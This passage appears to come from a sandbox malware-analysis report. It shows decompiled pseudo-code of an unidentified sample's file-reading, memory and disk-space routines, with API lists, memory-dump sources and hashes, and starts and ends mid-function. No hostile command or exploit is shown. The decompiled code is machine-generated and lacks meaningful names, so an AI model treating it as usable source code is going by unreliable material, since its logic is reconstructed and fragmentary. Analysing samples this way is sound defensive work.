										_t114 = E00C81000( &_v1732,  &_v1808, _t183, __eflags, _v1816);
										_t187 = 4 + _t187;
										__eflags = _t114;
										if(_t114 == 0) {
											goto L35;
										} else {
											__eflags = _v1808;
											_t153 = _v1816;
											if(_v1808 != 0) {
												_t144 = _v1796;
												_push( &_v1800);
												_push(_v1796);
												_push(_t153);
												_t117 = E00C85A40(_v1732);
												_t187 = _t187 + 0xc;
												__eflags = _t117;
												if(_t117 != 0) {
													_t172 = _v1800;
													_t168 =  &_v1780;
													_v1812 = 1;
													_t120 = E00C811C0(_t144,  &_v1772, _t172,  &_v1780,  &_v1776,  &_v1792,  &_v1800);
													_t188 = _t187 + 0x14;
													__eflags = _t120;
													if(__eflags == 0) {
														goto L54;
													} else {
														__eflags = _t178;
														if(_t178 != 0) {
															 *_t178 = 0;
															 *(_t178 + 0x28) = _t172;
														}
														__eflags = _v1788;
														if(__eflags == 0) {
															goto L56;
														} else {
															__eflags = E00C862E0(_v1816);
															if(__eflags == 0) {
																goto L54;
															} else {
																__eflags = _v1768;
																if(_v1768 == 0) {
																	__eflags = _a8;
																	_v1808 = 0xd47630;
																	if(__eflags != 0) {
																		goto L33;
																	} else {
																		_t136 = E00C81AC0(_t168, _t183, __eflags);
																		_v1784 = _t136;
																		__eflags = _t136 - 3;
																		if(__eflags == 0) {
																			goto L33;
																		} else {
																			_v1812 = 0;
																			goto L54;
																		}
																	}
																} else {
																	_v1808 = 0xd47528;
																	L33:
																	_t172 = _v1792;
																	_t144 =  &_v40;
																	_t131 = E00C81C80( &_v40, _v1816, _v1792,  &_v1792, _v1800);
																	_t188 = _t188 + 4;
																	__eflags = _t131;
																	if(_t131 != 0) {
																		__eflags = _v1792;
																		if(__eflags != 0) {
																			_t144 = _v1776;
																			_t168 = _v1808;
																			_v1792 = 0x10;
																			_t132 = E00C87700(_v1776, _v1808, _t183,  &_v24,  &_v1792);
																			_t188 = _t188 + 8;
																			__eflags = _t132;
																			if(__eflags == 0) {
																				_t133 = 0x10;
																				_t165 = 0;
																				__eflags = 0;
																				while(1) {
																					_t168 =  *(_t188 + _t165 + 0x6fc);
																					__eflags =  *(_t188 + _t165 + 0x6fc) -  *((intOrPtr*)(_t188 + _t165 + 0x70c));
																					if(__eflags != 0) {
																						goto L53;
																					}
																					_t133 = _t133 - 4;
																					_t165 = _t165 + 4;
																					__eflags = _t133 - 4;
																					if(_t133 >= 4) {
																						continue;
																					} else {
																						__eflags = E00C818D0( &_v1740);
																						if(__eflags == 0) {
																							_v1812 = 3;
																							__eflags = _v1784 - 2;
																							if(__eflags == 0) {
																								_v1812 = 2;
																							}
																						} else {
																							_v1812 = 2;
																						}
																					}
																					goto L53;
																				}
																			}
																		}
																		L53:
																		_t178 = _v1804;
																		goto L54;
																	} else {
																		_t178 = _v1804;
																		goto L35;
																	}
																}
															}
														}
													}
												} else {
													_t137 = _v1800;
													__eflags = _t137;
													if(_t137 <= 0) {
														goto L35;
													} else {
														__eflags = _t178;
														if(_t178 == 0) {
															L36:
															_t111 = _v1796;
															__eflags = _t111;
															if(__eflags != 0) {
																_push(_t111);
																E00D0092B(_t144, _t168, _t172, _t178, __eflags);
																_t187 = 4 + _t187;
															}
														} else {
															 *_t178 = 2;
															 *(_t178 + 0x28) = _t137;
															goto L35;
														}
													}
													L38:
													_t107 = _v1816;
													__eflags = _t107;
													if(__eflags != 0) {
														_push(_t107);
														E00D0092B(_t144, _t168, _t172, _t178, __eflags);
														_t187 = 4 + _t187;
													}
													_pop(_t173);
													_pop(_t179);
													_pop(_t145);
													__eflags = _v8 ^ _t187;
													return E00D0071A(0, _t145, _v8 ^ _t187, _t168, _t173, _t179);
												}
											} else {
												_t168 =  &_v1812;
												_t138 = E00C81EA0(_t153,  &_v1812, _t183,  &_v1812);
												_t187 = 4 + _t187;
												__eflags = _t138;
												if(_t138 == 0) {
													goto L35;
												} else {
													__eflags = _v1812;
													if(__eflags != 0) {
														_v1768 = 3;
														__eflags = _t178;
														if(__eflags != 0) {
															 *_t178 = 0;
														}
													}
													goto L54;
												}
											}
										}
									} else {
										_t168 = _t172;
										_t140 = E00C81F60( &_v708, _t172, _t183,  &_v1812);
										_t187 = 4 + _t187;
										if(_t140 == 0) {
											goto L35;
										} else {
											if(_v1812 != 0) {
												_v1768 = 4;
												if(_t178 != 0) {
													 *_t178 = 0;
												}
											}
											L54:
											_t121 = _v1788;
											if(_t121 != 0) {
												 *_t121 = _v1812;
											}
											L56:
											_t202 = _t178;
											if(_t178 != 0) {
												_t122 =  *_t178;
												_t178 =  &_v1772;
												_v1772 = _t122;
												memcpy(_v1804, _t178, 0xa << 2);
												_t189 = _t188 + 0xc;
												_t172 = _t178 + 0x14;
											} else {
												_t168 = _v1796;
												_push(_v1796);
												E00D0092B(_t144, _v1796, _t172, _t178, _t202);
												_t189 = _t188 + 4;
											}
											_push(_v1816); // executed
											E00D0092B(_t144, _t168, _t172, _t178, _t202); // executed
											_pop(_t176);
											_pop(_t180);
											_pop(_t146);
											return E00D0071A(1, _t146, _v8 ^ _t189 + 0x00000004, _t168, _t176, _t180);
										}
									}
								}
							}
						}
					}
				}
			}




































































                                                                                                                                                                                          0x00c82860
                                                                                                                                                                                          0x00c82866
                                                                                                                                                                                          0x00c8286c
                                                                                                                                                                                          0x00c82873
                                                                                                                                                                                          0x00c82880
                                                                                                                                                                                          0x00c82887
                                                                                                                                                                                          0x00c82890
                                                                                                                                                                                          0x00c82894
                                                                                                                                                                                          0x00c82898
                                                                                                                                                                                          0x00c8289c
                                                                                                                                                                                          0x00c828a0
                                                                                                                                                                                          0x00c828a4
                                                                                                                                                                                          0x00c828ac
                                                                                                                                                                                          0x00c828b3
                                                                                                                                                                                          0x00c828ba
                                                                                                                                                                                          0x00c828bd
                                                                                                                                                                                          0x00c828c1
                                                                                                                                                                                          0x00c828c5
                                                                                                                                                                                          0x00c828c9
                                                                                                                                                                                          0x00c828cd
                                                                                                                                                                                          0x00c828d1
                                                                                                                                                                                          0x00c828d5
                                                                                                                                                                                          0x00c828d9
                                                                                                                                                                                          0x00c828dd
                                                                                                                                                                                          0x00c828e1
                                                                                                                                                                                          0x00c828e5
                                                                                                                                                                                          0x00c828eb
                                                                                                                                                                                          0x00c829ad
                                                                                                                                                                                          0x00c829ba
                                                                                                                                                                                          0x00c829bc
                                                                                                                                                                                          0x00c829bf
                                                                                                                                                                                          0x00c829c1
                                                                                                                                                                                          0x00c829c5
                                                                                                                                                                                          0x00c829c5
                                                                                                                                                                                          0x00c829cb
                                                                                                                                                                                          0x00c829cf
                                                                                                                                                                                          0x00c829d1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c829d7
                                                                                                                                                                                          0x00c829d7
                                                                                                                                                                                          0x00c829dc
                                                                                                                                                                                          0x00c829dd
                                                                                                                                                                                          0x00c829de
                                                                                                                                                                                          0x00c829e3
                                                                                                                                                                                          0x00c829e8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c829e8
                                                                                                                                                                                          0x00c828f1
                                                                                                                                                                                          0x00c828f1
                                                                                                                                                                                          0x00c828f4
                                                                                                                                                                                          0x00c828fa
                                                                                                                                                                                          0x00c828ff
                                                                                                                                                                                          0x00c8299d
                                                                                                                                                                                          0x00c8299d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c82905
                                                                                                                                                                                          0x00c82905
                                                                                                                                                                                          0x00c82908
                                                                                                                                                                                          0x00c8290a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c82910
                                                                                                                                                                                          0x00c82910
                                                                                                                                                                                          0x00c82914
                                                                                                                                                                                          0x00c82918
                                                                                                                                                                                          0x00c82919
                                                                                                                                                                                          0x00c8291e
                                                                                                                                                                                          0x00c82921
                                                                                                                                                                                          0x00c82925
                                                                                                                                                                                          0x00c82927
                                                                                                                                                                                          0x00c82b27
                                                                                                                                                                                          0x00c82b27
                                                                                                                                                                                          0x00c82b29
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8292d
                                                                                                                                                                                          0x00c8292d
                                                                                                                                                                                          0x00c82932
                                                                                                                                                                                          0x00c82939
                                                                                                                                                                                          0x00c8293b
                                                                                                                                                                                          0x00c82943
                                                                                                                                                                                          0x00c82948
                                                                                                                                                                                          0x00c8294d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c82953
                                                                                                                                                                                          0x00c82958
                                                                                                                                                                                          0x00c829f5
                                                                                                                                                                                          0x00c829fd
                                                                                                                                                                                          0x00c82a02
                                                                                                                                                                                          0x00c82a05
                                                                                                                                                                                          0x00c82a07
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c82a0d
                                                                                                                                                                                          0x00c82a0d
                                                                                                                                                                                          0x00c82a12
                                                                                                                                                                                          0x00c82a16
                                                                                                                                                                                          0x00c82a53
                                                                                                                                                                                          0x00c82a5b
                                                                                                                                                                                          0x00c82a60
                                                                                                                                                                                          0x00c82a61
                                                                                                                                                                                          0x00c82a62
                                                                                                                                                                                          0x00c82a67
                                                                                                                                                                                          0x00c82a6a
                                                                                                                                                                                          0x00c82a6c
                                                                                                                                                                                          0x00c82a90
                                                                                                                                                                                          0x00c82aa3
                                                                                                                                                                                          0x00c82aaf
                                                                                                                                                                                          0x00c82ab7
                                                                                                                                                                                          0x00c82abc
                                                                                                                                                                                          0x00c82abf
                                                                                                                                                                                          0x00c82ac1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c82ac7
                                                                                                                                                                                          0x00c82ac7
                                                                                                                                                                                          0x00c82ac9
                                                                                                                                                                                          0x00c82acb
                                                                                                                                                                                          0x00c82ad1
                                                                                                                                                                                          0x00c82ad1
                                                                                                                                                                                          0x00c82ad4
                                                                                                                                                                                          0x00c82ad9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c82adf
                                                                                                                                                                                          0x00c82ae8
                                                                                                                                                                                          0x00c82aea
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c82af0
                                                                                                                                                                                          0x00c82af0
                                                                                                                                                                                          0x00c82af5
                                                                                                                                                                                          0x00c82b64
                                                                                                                                                                                          0x00c82b68
                                                                                                                                                                                          0x00c82b70
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c82b72
                                                                                                                                                                                          0x00c82b72
                                                                                                                                                                                          0x00c82b77
                                                                                                                                                                                          0x00c82b7b
                                                                                                                                                                                          0x00c82b7e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c82b84
                                                                                                                                                                                          0x00c82b84
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c82b84
                                                                                                                                                                                          0x00c82b7e
                                                                                                                                                                                          0x00c82af7
                                                                                                                                                                                          0x00c82af7
                                                                                                                                                                                          0x00c82aff
                                                                                                                                                                                          0x00c82b03
                                                                                                                                                                                          0x00c82b10
                                                                                                                                                                                          0x00c82b17
                                                                                                                                                                                          0x00c82b1c
                                                                                                                                                                                          0x00c82b1f
                                                                                                                                                                                          0x00c82b21
                                                                                                                                                                                          0x00c82b91
                                                                                                                                                                                          0x00c82b96
                                                                                                                                                                                          0x00c82b9c
                                                                                                                                                                                          0x00c82bb1
                                                                                                                                                                                          0x00c82bb5
                                                                                                                                                                                          0x00c82bbd
                                                                                                                                                                                          0x00c82bc2
                                                                                                                                                                                          0x00c82bc5
                                                                                                                                                                                          0x00c82bc7
                                                                                                                                                                                          0x00c82bc9
                                                                                                                                                                                          0x00c82bce
                                                                                                                                                                                          0x00c82bce
                                                                                                                                                                                          0x00c82bd0
                                                                                                                                                                                          0x00c82bd0
                                                                                                                                                                                          0x00c82bd7
                                                                                                                                                                                          0x00c82bde
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c82be0
                                                                                                                                                                                          0x00c82be3
                                                                                                                                                                                          0x00c82be6
                                                                                                                                                                                          0x00c82be9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c82beb
                                                                                                                                                                                          0x00c82bf4
                                                                                                                                                                                          0x00c82bf6
                                                                                                                                                                                          0x00c82c07
                                                                                                                                                                                          0x00c82c0f
                                                                                                                                                                                          0x00c82c13
                                                                                                                                                                                          0x00c82c15
                                                                                                                                                                                          0x00c82c15
                                                                                                                                                                                          0x00c82bf8
                                                                                                                                                                                          0x00c82bf8
                                                                                                                                                                                          0x00c82bf8
                                                                                                                                                                                          0x00c82bf6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c82be9
                                                                                                                                                                                          0x00c82bd0
                                                                                                                                                                                          0x00c82bc7
                                                                                                                                                                                          0x00c82c19
                                                                                                                                                                                          0x00c82c19
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c82b23
                                                                                                                                                                                          0x00c82b23
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c82b23
                                                                                                                                                                                          0x00c82b21
                                                                                                                                                                                          0x00c82af5
                                                                                                                                                                                          0x00c82aea
                                                                                                                                                                                          0x00c82ad9
                                                                                                                                                                                          0x00c82a6e
                                                                                                                                                                                          0x00c82a6e
                                                                                                                                                                                          0x00c82a72
                                                                                                                                                                                          0x00c82a74
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c82a7a
                                                                                                                                                                                          0x00c82a7a
                                                                                                                                                                                          0x00c82a7c
                                                                                                                                                                                          0x00c82b2b
                                                                                                                                                                                          0x00c82b2b
                                                                                                                                                                                          0x00c82b2f
                                                                                                                                                                                          0x00c82b31
                                                                                                                                                                                          0x00c82b33
                                                                                                                                                                                          0x00c82b34
                                                                                                                                                                                          0x00c82b39
                                                                                                                                                                                          0x00c82b39
                                                                                                                                                                                          0x00c82a82
                                                                                                                                                                                          0x00c82a82
                                                                                                                                                                                          0x00c82a88
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c82a88
                                                                                                                                                                                          0x00c82a7c
                                                                                                                                                                                          0x00c82b3c
                                                                                                                                                                                          0x00c82b3c
                                                                                                                                                                                          0x00c82b40
                                                                                                                                                                                          0x00c82b42
                                                                                                                                                                                          0x00c82b44
                                                                                                                                                                                          0x00c82b45
                                                                                                                                                                                          0x00c82b4a
                                                                                                                                                                                          0x00c82b4a
                                                                                                                                                                                          0x00c82b4f
                                                                                                                                                                                          0x00c82b50
                                                                                                                                                                                          0x00c82b51
                                                                                                                                                                                          0x00c82b59
                                                                                                                                                                                          0x00c82b63
                                                                                                                                                                                          0x00c82b63
                                                                                                                                                                                          0x00c82a18
                                                                                                                                                                                          0x00c82a18
                                                                                                                                                                                          0x00c82a1d
                                                                                                                                                                                          0x00c82a22
                                                                                                                                                                                          0x00c82a25
                                                                                                                                                                                          0x00c82a27
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c82a2d
                                                                                                                                                                                          0x00c82a2d
                                                                                                                                                                                          0x00c82a32
                                                                                                                                                                                          0x00c82a38
                                                                                                                                                                                          0x00c82a40
                                                                                                                                                                                          0x00c82a42
                                                                                                                                                                                          0x00c82a48
                                                                                                                                                                                          0x00c82a48
                                                                                                                                                                                          0x00c82a42
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c82a32
                                                                                                                                                                                          0x00c82a27
                                                                                                                                                                                          0x00c82a16
                                                                                                                                                                                          0x00c8295e
                                                                                                                                                                                          0x00c82965
                                                                                                                                                                                          0x00c82967
                                                                                                                                                                                          0x00c8296c
                                                                                                                                                                                          0x00c82971
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c82977
                                                                                                                                                                                          0x00c8297c
                                                                                                                                                                                          0x00c82982
                                                                                                                                                                                          0x00c8298c
                                                                                                                                                                                          0x00c82992
                                                                                                                                                                                          0x00c82992
                                                                                                                                                                                          0x00c8298c
                                                                                                                                                                                          0x00c82c1d
                                                                                                                                                                                          0x00c82c1d
                                                                                                                                                                                          0x00c82c23
                                                                                                                                                                                          0x00c82c29
                                                                                                                                                                                          0x00c82c29
                                                                                                                                                                                          0x00c82c2b
                                                                                                                                                                                          0x00c82c2b
                                                                                                                                                                                          0x00c82c2d
                                                                                                                                                                                          0x00c82c3e
                                                                                                                                                                                          0x00c82c49
                                                                                                                                                                                          0x00c82c4d
                                                                                                                                                                                          0x00c82c51
                                                                                                                                                                                          0x00c82c51
                                                                                                                                                                                          0x00c82c51
                                                                                                                                                                                          0x00c82c2f
                                                                                                                                                                                          0x00c82c2f
                                                                                                                                                                                          0x00c82c33
                                                                                                                                                                                          0x00c82c34
                                                                                                                                                                                          0x00c82c39
                                                                                                                                                                                          0x00c82c39
                                                                                                                                                                                          0x00c82c57
                                                                                                                                                                                          0x00c82c58
                                                                                                                                                                                          0x00c82c67
                                                                                                                                                                                          0x00c82c68
                                                                                                                                                                                          0x00c82c69
                                                                                                                                                                                          0x00c82c79
                                                                                                                                                                                          0x00c82c79
                                                                                                                                                                                          0x00c82971
                                                                                                                                                                                          0x00c82958
                                                                                                                                                                                          0x00c8294d
                                                                                                                                                                                          0x00c82927
                                                                                                                                                                                          0x00c8290a
                                                                                                                                                                                          0x00c828ff

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C828B3
                                                                                                                                                                                          • _malloc.LIBCMT ref: 00C829B5
                                                                                                                                                                                          • SetLastError.KERNEL32(00000008,00002000,?,00000000), ref: 00C829C5
                                                                                                                                                                                            • Part of subcall function 00C85690: _malloc.LIBCMT ref: 00C8569C
                                                                                                                                                                                            • Part of subcall function 00C85690: SetLastError.KERNEL32(00000008,00000000,00C8291E,00000000,00002000,?,00000000), ref: 00C856AE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast_malloc$_memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1834304950-0
                                                                                                                                                                                          • Opcode ID: a87c26e5af608af0797ed408aedfa6c5e3fed4ea1ef4306235eb26ae0ed1ba54
                                                                                                                                                                                          • Instruction ID: 6417863721d66cb54dac6d501182e8ccd96ddc289803c5961833b36126a3e6a0
                                                                                                                                                                                          • Opcode Fuzzy Hash: a87c26e5af608af0797ed408aedfa6c5e3fed4ea1ef4306235eb26ae0ed1ba54
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5EB14DB19083019BD720EF15D48976BB7E4EFC4718F04492DF8A987241E774EA49CBA7
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C84CB0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 69%
                                                                                                                                                                                          			E00C84CB0(long __ecx, void* __edi, void* __ebp, union _LARGE_INTEGER _a4, union _LARGE_INTEGER* _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _v4;
				short _v10;
				short _v12;
				void _v16;
				long _v20;
				long* _v24;
				long _v28;
				long _v32;
				intOrPtr _v36;
				void* __ebx;
				void* __esi;
				signed int _t29;
				intOrPtr* _t31;
				int _t33;
				long* _t35;
				int _t39;
				long _t47;
				void* _t57;
				long _t58;
				union _LARGE_INTEGER* _t60;
				signed int _t61;

				_t57 = __edi;
				_t29 =  *0xd64070; // 0x8a9e1774
				_v4 = _t29 ^ _t61;
				_t31 = _a16;
				_t47 = 0;
				_t58 = __ecx;
				_v20 = __ecx;
				_v24 = _t31;
				_v32 = 0;
				if(_t31 != 0) {
					_v36 =  *_t31;
				} else {
					_v36 = 0xffffffff;
				}
				_t60 = _a8;
				_push(_t47);
				_t33 = SetFilePointerEx(_t57, _a4.LowPart, _t60, _t47); // executed
				if(_t33 == 0) {
					L14:
					_push(0xd47270);
					_push(0);
					_push(0);
					_t55 = 0xd47270;
					E00C88150(0xd47270);
					_t61 = _t61 + 0xc;
				} else {
					_t55 =  &_v28;
					_t39 = ReadFile(_t57,  &_v16, 8,  &_v28, 0); // executed
					if(_t39 == 0) {
						goto L14;
					} else {
						if(_v28 == 8) {
							if(_a12 == _t47) {
								_t58 = _v16;
								if(_t58 <= _v36) {
									_t47 = 0;
									_push(0);
									if(SetFilePointerEx(_t57, _a4, _t60, 0) != 0) {
										_t55 = _t57;
										if(E00C83E90(_t57, _t58) != 0) {
											_t47 = _v16;
											goto L17;
										}
									} else {
										goto L14;
									}
								} else {
									_t47 = _t58;
									goto L9;
								}
							} else {
								_t47 = 8;
								if(_v36 >= 8) {
									_t55 = _v12;
									 *_t58 = _v16;
									 *((short*)(_t58 + 4)) = _v12;
									 *((short*)(_t58 + 6)) = _v10;
									L17:
									_v32 = 1;
								} else {
									L9:
									E00C88420(5, 0xd47270);
									_t61 = _t61 + 4;
								}
							}
						} else {
							E00C88420(1, 0xd47270);
							_t61 = _t61 + 4;
						}
					}
				}
				_t35 = _v24;
				if(_t35 != 0) {
					 *_t35 = _t47;
				}
				return E00D0071A(_v32, _t47, _v4 ^ _t61, _t55, _t57, _t58);
			}
























                                                                                                                                                                                          0x00c84cb0
                                                                                                                                                                                          0x00c84cb3
                                                                                                                                                                                          0x00c84cba
                                                                                                                                                                                          0x00c84cbe
                                                                                                                                                                                          0x00c84cc4
                                                                                                                                                                                          0x00c84cc7
                                                                                                                                                                                          0x00c84cc9
                                                                                                                                                                                          0x00c84ccd
                                                                                                                                                                                          0x00c84cd1
                                                                                                                                                                                          0x00c84cd7
                                                                                                                                                                                          0x00c84ce5
                                                                                                                                                                                          0x00c84cd9
                                                                                                                                                                                          0x00c84cd9
                                                                                                                                                                                          0x00c84cd9
                                                                                                                                                                                          0x00c84ce9
                                                                                                                                                                                          0x00c84cf1
                                                                                                                                                                                          0x00c84cf6
                                                                                                                                                                                          0x00c84cfe
                                                                                                                                                                                          0x00c84da2
                                                                                                                                                                                          0x00c84da2
                                                                                                                                                                                          0x00c84da7
                                                                                                                                                                                          0x00c84da9
                                                                                                                                                                                          0x00c84dab
                                                                                                                                                                                          0x00c84db0
                                                                                                                                                                                          0x00c84db5
                                                                                                                                                                                          0x00c84d04
                                                                                                                                                                                          0x00c84d06
                                                                                                                                                                                          0x00c84d13
                                                                                                                                                                                          0x00c84d1b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84d21
                                                                                                                                                                                          0x00c84d2a
                                                                                                                                                                                          0x00c84d47
                                                                                                                                                                                          0x00c84d7f
                                                                                                                                                                                          0x00c84d87
                                                                                                                                                                                          0x00c84d91
                                                                                                                                                                                          0x00c84d93
                                                                                                                                                                                          0x00c84da0
                                                                                                                                                                                          0x00c84dbe
                                                                                                                                                                                          0x00c84dc7
                                                                                                                                                                                          0x00c84dc9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84dc9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84d89
                                                                                                                                                                                          0x00c84d89
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84d89
                                                                                                                                                                                          0x00c84d49
                                                                                                                                                                                          0x00c84d49
                                                                                                                                                                                          0x00c84d4f
                                                                                                                                                                                          0x00c84d69
                                                                                                                                                                                          0x00c84d6e
                                                                                                                                                                                          0x00c84d75
                                                                                                                                                                                          0x00c84d79
                                                                                                                                                                                          0x00c84dcd
                                                                                                                                                                                          0x00c84dcd
                                                                                                                                                                                          0x00c84d51
                                                                                                                                                                                          0x00c84d51
                                                                                                                                                                                          0x00c84d5b
                                                                                                                                                                                          0x00c84d60
                                                                                                                                                                                          0x00c84d60
                                                                                                                                                                                          0x00c84d4f
                                                                                                                                                                                          0x00c84d2c
                                                                                                                                                                                          0x00c84d36
                                                                                                                                                                                          0x00c84d3b
                                                                                                                                                                                          0x00c84d3b
                                                                                                                                                                                          0x00c84d2a
                                                                                                                                                                                          0x00c84d1b
                                                                                                                                                                                          0x00c84dd5
                                                                                                                                                                                          0x00c84ddb
                                                                                                                                                                                          0x00c84ddd
                                                                                                                                                                                          0x00c84ddd
                                                                                                                                                                                          0x00c84df4

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,00000000,?,00000000,?,?,00C81043,?), ref: 00C84CF6
                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000008,?,00000000,?,00000000,?,00000000,?,?,00C81043,?), ref: 00C84D13
                                                                                                                                                                                          • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,00000000,?,00000000,?,?,00C81043,?), ref: 00C84D98
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Pointer$Read
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2010065189-0
                                                                                                                                                                                          • Opcode ID: 2e06805a2c2e443cd52680a4d76f7654b0f023436e866a9d633edadaed06e865
                                                                                                                                                                                          • Instruction ID: 8f5119dc5403572af9fa3b2df3b745c5b913416fc0acde8c6b3c96411fe0a4a5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e06805a2c2e443cd52680a4d76f7654b0f023436e866a9d633edadaed06e865
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B314A70609302AFD714EF65D981B2BB3E8EB88748F40492EF59597280EB71DD048B6B
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CE7974 Relevance: 4.6, APIs: 3, Instructions: 69COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                          			E00CE7974(intOrPtr __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				int _t38;
				union _ULARGE_INTEGER* _t39;
				intOrPtr _t43;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t55;
				signed int _t56;
				void* _t58;

				_t48 = __edx;
				_t56 = _t58 - 0x1ac;
				_t24 =  *0xd64070; // 0x8a9e1774
				 *(_t56 + 0x1a8) = _t24 ^ _t56;
				_t54 =  *((intOrPtr*)(_t56 + 0x1b4));
				 *(_t56 - 0x70) =  *(_t56 + 0x1b8);
				_t27 = 0;
				if( *((intOrPtr*)(_t56 + 0x1b4)) != 0) {
					 *(_t56 - 0x64) = 0;
					E00D006A0(_t49, _t56 - 0x62, 0, 0x208);
					E00D0A9EB(_t54, _t56 - 0x64, 0, 0, 0);
					 *(_t56 - 0x6c) = 0;
					asm("stosd");
					 *(_t56 - 0x80) = 0;
					asm("stosd");
					 *(_t56 - 0x78) = 0;
					asm("stosd");
					_t38 = GetDiskFreeSpaceExW(_t56 - 0x64, _t56 - 0x6c, _t56 - 0x80, _t56 - 0x78); // executed
					_t49 = _t49;
					if(_t38 == 0) {
						_t27 = 0;
